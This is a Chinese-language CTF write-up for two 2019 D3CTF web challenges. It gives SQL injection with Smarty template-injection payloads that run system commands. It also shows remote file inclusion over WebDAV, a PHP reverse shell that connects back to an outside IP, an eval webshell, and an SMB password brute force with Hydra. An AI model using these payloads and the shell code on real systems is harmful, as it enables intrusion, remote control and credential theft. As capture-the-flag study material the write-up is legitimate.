2019 D3CTF 部分题解

摸了。

easyweb

源码审计。

1
2
3
4
5
private function safe_render($username)
{
$username = str_replace(array('{', '}'), '', $username);
return $username;
}

safe_render()方法会替换{}为空,因此构造un{ion sele}ct绕过。

发现追加select 0x736f757468 #有回显,再根据以上过滤的{},猜测二次注入加上SSTI

翻了一下Smarty的一些Payload,测试发现可以使用{php}{/php}

于是southsea’ un{ion sele}ct 0x7b7b7068707d7d706870696e666f28293b7b7b2f7068707d7d #,发现解析成功。

1
2
3
4
5
6
7
8
"{{php}}system('ls /');{{/php}}".encode('hex')
# southsea' un{ion sele}ct 0x7b7b7068707d7d73797374656d28276c73202f27293b7b7b2f7068707d7d #

"{{php}}system('cat /flag');{{/php}}".encode('hex')
# southsea' un{ion sele}ct 0x7b7b7068707d7d73797374656d2827636174202f666c616727293b7b7b2f7068707d7d #

"{{php}}system('/readflag /flag');{{/php}}".encode('hex')
# southsea' un{ion sele}ct 0x7b7b7068707d7d73797374656d28272f72656164666c6167202f666c616727293b7b7b2f7068707d7d #

得到d3ctf{Th4at’s_A_Si11y_P0p_chi4n},似乎非预期了。

fakeonlinephp

源码。

1
<?php ([email protected]$_GET['orange']) && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__);

扫描一下,一个.git泄漏,提示了内网,还有字典,并得知是Windows服务器。

根据源码,尝试了一下伪协议包含,/?orange=data://text/plain;base64,QDw/cGhw,弹了三个Warning

1
2
3
4
5
Warning: include(): data:// wrapper is disabled in the server configuration by allow_url_include=0 in C:\Users\w1nd\Desktop\web\nginx-1.17.6\html\index.php on line 1

Warning: include(data://text/plain;base64,QDw/cGhw): failed to open stream: no suitable wrapper could be found in C:\Users\w1nd\Desktop\web\nginx-1.17.6\html\index.php on line 1

Warning: include(): Failed opening 'data://text/plain;base64,QDw/cGhw' for inclusion (include_path='.;C:\php\pear') in C:\Users\w1nd\Desktop\web\nginx-1.17.6\html\index.php on line 1

七友师傅指出可以用包含WebdavSMB服务的方式绕过。

那么起一个服务。

1
docker run -v ~/webdav:/var/lib/dav -e ANONYMOUS_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav

然后在服务下写Shell,先测试一下。

1
2
3
vim webdav/data/south.php

@<?php phpinfo();

然后访问/?orange=//122.51.113.164//webdav/south.php,显示成功。

尝试包含一句话,失败了,应该是开启了Windows Defender,于是尝试直接反弹Shell

这儿Webdav似有缓存,另起一个。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
vim webdav/data/sea.php

@<?php
set_time_limit(0);
$ip = "122.51.113.164";
$port = "2333";
$fp = @fsockopen($ip, $port, $errno, $errstr);
if (!$fp) {
echo "error";
} else {
fputs($fp, "\n++++++++++connect success++++++++\n");
while (!feof($fp)) {
fputs($fp, "shell:");
$shell = fgets($fp);
$message = `$shell`;
fputs($fp, $message);
}
fclose($fp);
}

拿到反弹Shell后方便很多,但是根据.git中的提示,还需要内网渗透,因此需要传一些工具,我还是决定写一个WebShell进去。

经过尝试,发现诸如$_POST[‘south’]$_GET[‘south’]之类的无法写入,可以用{}代替[],且Web目录下无写权限。

1
echo @^<?php eval(($_POST){south})?^> > C:\Users\w1nd\Desktop\web\nginx-1.17.6\south

蚁剑连一下,快乐多了,再传个Hydra

1
2
3
4
5
6
7
8
9
10
hydra -l administrator -P dict.txt smb://172.19.97.8
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-26 13:34:15
[DATA] max 1 task per 1 server, overall 1 task, 10000 login tries (l:1/p:0), ~10000 tries per task
[DATA] attacking smb://172.19.97.8:445/
[STATUS] 3646.00 tries/min, 3646 tries in 00:00h, 0 to do in 01:00h, 6354 active
[445][smb] host: 172.19.97.8 login: administrator password: eDHU27TlY6ugslV
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-11-26 13:36:00

拿到了密码,尝试登陆。

1
net use \\172.19.97.8\c$ eDHU27TlY6ugslV /user:172_19_97_8\administrator

然后获取flag

1
2
3
type \\172.19.97.8\c$\Users\Administrator\Desktop\flag.txt

d3ctf{Sh3ll_fr0m_ur1111_inc1ude!1!!!_soCoooool}